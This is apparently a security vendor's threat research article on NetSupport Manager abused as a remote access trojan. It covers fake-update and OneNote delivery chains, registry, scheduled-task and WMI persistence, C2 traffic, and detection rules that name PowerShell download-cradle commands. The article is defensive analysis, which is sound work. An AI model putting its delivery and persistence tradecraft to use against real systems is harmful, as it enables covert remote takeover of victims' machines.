NetSupport Manager is a legitimate remote administration tool that has been commercially available since 1989. Originally designed for IT helpdesks to provide remote support, it has become one of the most frequently weaponised legitimate tools in the cybercriminal ecosystem. Its legitimate origins make it particularly challenging to detect: it is digitally signed, widely recognised by security tools as benign software, and its network traffic blends with legitimate remote administration protocols.
The SenseOn Threat Research Team has observed a sustained increase in NetSupport RAT deployments across our customer base throughout 2024. This article provides a technical analysis of the delivery mechanisms, persistence techniques, command-and-control infrastructure, and detection opportunities that our research has identified.
Why Threat Actors Choose NetSupport Manager
NetSupport Manager offers several characteristics that make it attractive to threat actors:
Legitimacy: As a commercially available tool with valid code-signing certificates, NetSupport Manager is frequently allowlisted by endpoint security products. Many organisations explicitly permit it for their own IT support operations, creating a pre-existing exception that attackers exploit.
Full remote control: Unlike purpose-built RATs that may offer limited functionality, NetSupport Manager provides complete remote desktop control, file transfer, registry editing, command execution, and inventory management. It is a fully featured remote administration suite.
Stealth: NetSupport Manager can be configured to run silently, without the system tray icon or user notifications that would alert the victim to its presence. The silent installation mode is a configuration option, not a modification that would trigger behavioural detection.
Infrastructure simplicity: Threat actors do not need to develop or maintain custom command-and-control infrastructure. NetSupport Manager's built-in gateway system handles NAT traversal and connection management.
Delivery Mechanisms
Our analysis has identified three primary delivery mechanisms used in current NetSupport RAT campaigns.
Fake Browser Update Pages
The most prevalent delivery mechanism involves compromised websites that display convincing fake browser update notifications. When a user visits a compromised site, injected JavaScript evaluates the visitor's browser type and displays a tailored update prompt: Chrome users see a Chrome update page, Edge users see an Edge update page, and Firefox users see a Firefox update page.
Clicking the update button downloads a ZIP archive containing a heavily obfuscated JavaScript file. When executed, this JavaScript file uses PowerShell to download and install the NetSupport Manager client in silent mode. The JavaScript dropper typically uses multiple layers of obfuscation, including string concatenation, base64 encoding, character code conversion, and environment variable abuse, to evade static analysis.
Phishing with Malicious Attachments
Phishing campaigns deliver NetSupport RAT through Microsoft Office documents containing malicious macros or, increasingly, through OneNote documents with embedded scripts. The OneNote vector has gained popularity since Microsoft's default blocking of VBA macros in documents downloaded from the internet.
A typical attack chain begins with an email purporting to be an invoice, shipping notification, or legal document. The attached OneNote file contains an embedded HTA (HTML Application) file disguised as a button or image. Clicking the disguised element executes the HTA, which launches a PowerShell download cradle that retrieves and installs NetSupport Manager.
Malvertising Chains
Sophisticated campaigns use malvertising, malicious advertisements served through legitimate advertising networks, to redirect users through a series of traffic distribution systems (TDS) before landing on a fake software download page. These pages mimic legitimate software repositories and offer trojanised installers that bundle NetSupport Manager with the expected software.
Persistence Mechanisms
Once installed, NetSupport RAT campaigns employ several persistence mechanisms to survive system reboots:
Registry Run keys: The most common persistence mechanism adds entries to HKCU\Software\Microsoft\Windows\CurrentVersion\Run or the equivalent HKLM key. The entry points to the NetSupport Manager executable, often placed in a directory designed to appear legitimate (e.g., C:\Users\<user>\AppData\Roaming\Microsoft\NetSupport\).
Scheduled tasks: Some variants create scheduled tasks that execute the NetSupport Manager client at logon or at regular intervals. The task names are designed to blend with legitimate Windows tasks: names like WindowsUpdateCheck or SystemHealthMonitor are common.
Startup folder shortcuts: Simpler deployments place a shortcut (.lnk file) in the user's Startup folder. Whilst less stealthy than registry modifications, this approach requires no elevated privileges.
WMI event subscriptions: More sophisticated campaigns use Windows Management Instrumentation (WMI) event subscriptions to trigger execution. WMI persistence is particularly difficult to detect because it does not create visible file system artefacts and is not displayed in common autoruns enumeration tools.
Command-and-Control Communication
NetSupport Manager communicates with its controller using a proprietary protocol over TCP, typically on port 5405, though this is configurable. The traffic characteristics include:
Initial handshake: The client initiates a connection to the configured gateway or controller address. The handshake includes client identification information and capability negotiation.
Encrypted channel: Communication between client and controller is encrypted, making content inspection difficult. However, the protocol's handshake patterns and packet size distributions create identifiable network signatures.
Gateway infrastructure: Many campaigns use NetSupport Manager's gateway feature, which acts as a relay between the controller and clients behind NAT. Threat actors configure gateways on infrastructure they control, typically compromised servers or rented VPS instances.
HTTP tunnelling: Some configurations tunnel NetSupport Manager traffic through HTTP to bypass firewall restrictions. This variant communicates on port 80 or 443 and encapsulates the proprietary protocol within HTTP requests.
Detection Opportunities
Despite NetSupport Manager's legitimate origins, several detection opportunities exist at each stage of the attack chain.
Delivery Stage
- JavaScript execution from browser downloads: Monitor for
wscript.exeorcscript.exeexecuting JavaScript files from browser download directories. - PowerShell download cradles: Detect PowerShell commands containing
Invoke-WebRequest,Net.WebClient, orStart-BitsTransferthat download executable content. - OneNote spawning script engines: Alert on
onenote.exespawningmshta.exe,wscript.exe,cscript.exe, orpowershell.exe.
Installation Stage
- NetSupport Manager file artefacts: Monitor for the creation of
client32.exe,client32.ini,NSM.lic, and related files outside expected IT administration directories. - Silent installation flags: Detect command-line execution of NetSupport Manager installers with silent installation parameters.
- Suspicious directory creation: Alert on creation of directories mimicking system paths within user-writable locations.
Persistence Stage
- Registry monitoring: Track additions to Run/RunOnce registry keys that reference executables in atypical locations.
- Scheduled task creation: Monitor
schtasks.execreating tasks that execute binaries from user-writable paths. - WMI subscription creation: Audit WMI event consumer and filter creation events (Event IDs 19, 20, 21 in Sysmon).
Command-and-Control Stage
- Network signatures: Monitor for NetSupport Manager's proprietary protocol signatures on non-standard ports.
- Gateway communication patterns: Detect sustained outbound connections to IP addresses associated with known NetSupport RAT infrastructure.
- Anomalous remote administration traffic: Flag NetSupport Manager network traffic from endpoints that are not authorised for remote administration.
SenseOn's Multi-Layer Detection Approach
SenseOn's platform is uniquely positioned to detect NetSupport RAT activity because it monitors endpoint, network, and identity telemetry simultaneously. Traditional security tools that focus on a single telemetry source may detect individual indicators but miss the broader attack narrative.
The cross-domain correlation engine correlates signals across layers: a suspicious JavaScript execution on the endpoint, combined with a PowerShell download cradle, followed by NetSupport Manager network traffic to an uncategorised external IP, creates a high-confidence detection that no single-layer tool could achieve with the same accuracy.
Behavioural baselines are particularly effective against NetSupport RAT. Because the tool is legitimately used in many organisations, signature-based detection alone produces false positives. SenseOn's unsupervised learning models establish which endpoints normally generate remote administration traffic and to which destinations, enabling precise detection of anomalous NetSupport Manager usage without disrupting legitimate IT operations.
Recommendations
Organisations should take the following steps to defend against NetSupport RAT campaigns:
- Audit existing NetSupport Manager deployments: Know where the tool is legitimately installed and establish a baseline of authorised usage.
- Implement application control: Restrict NetSupport Manager execution to authorised endpoints and user accounts.
- Monitor delivery vectors: Deploy detection rules for the JavaScript, PowerShell, and OneNote delivery mechanisms described above.
- Network segmentation: Ensure that remote administration traffic is restricted to approved network segments and destinations.
- User awareness: Educate users about fake browser update pages and the risks of executing downloaded scripts.
